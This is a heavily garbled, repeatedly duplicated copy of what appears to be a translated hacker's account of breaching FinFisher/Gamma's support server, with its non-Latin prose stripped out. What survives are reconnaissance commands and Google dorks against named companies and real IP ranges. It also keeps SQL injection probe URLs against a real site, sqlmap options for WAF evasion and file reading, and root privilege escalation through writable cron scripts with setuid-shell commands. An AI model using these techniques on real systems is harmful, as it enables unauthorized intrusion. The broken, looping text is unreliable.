: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
